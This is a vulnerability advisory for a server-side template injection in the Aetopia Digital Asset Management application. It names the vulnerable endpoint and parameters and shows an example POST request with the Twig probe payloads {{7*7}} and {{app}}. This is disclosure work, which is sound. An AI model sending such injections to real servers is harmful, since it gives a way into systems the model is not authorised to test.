[CVE-2026-38450] Aetopia DAM Server-Side Template Injection
https://www.cve.org/CVERecord?id=CVE-2026-38450
Description
A Server-Side Template Injection (SSTI) vulnerability in the Aetopia Digital Asset Management (DAM) application allows an authenticated user to inject Twig template expressions that are evaluated by the server. This behavior may expose internal application data and could potentially lead to further server-side impact depending on the configuration. The DAM solution can be used by different clients to store and manage the digital assets.
Application Details
Name: DAM
Vendor: Aetopia
Technical Details
Vulnerable Endpoint:
/c/project/[ID]/editVulnerable Parameters:
nameanddescriptionRequest Type: POST
Payload Sample:
{{7*7}}
Exploitation
The request below is being used to update the name and the description of the project. The vulnerable parameters are the name and description. Both of them can receive SSTI payloads. The used template is TWIG.
POST /c/project/[ID]/edit HTTP/2
Host: REDACTED
Cookie: XSRF-TOKEN=eZ[...]Nn; JSESSIONID=26[...]86; AetopiaSessionTimeout=176[...]80; AetopiaSessionDuration=1[...]0
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0
[...]
_csrf=tzl[...]nM&name=aykalam+%7B%7B+7*7+%7D%7D&date-search-field-startDate=&date-search-field-endDate=&description=%7B%7B%20app%20%7D%7D&entityMeta=ew[...]H0A&submit=
The response shows the execution of the 2 payloads {{7*7}} and {{app}}

Nuclei Template
The below Nulcei template can help you to quickly detect the vulnerability. You have to replace the CSRF token, the project ID and the entityMeta parameters. You can copy/paste from any valid request.
Last updated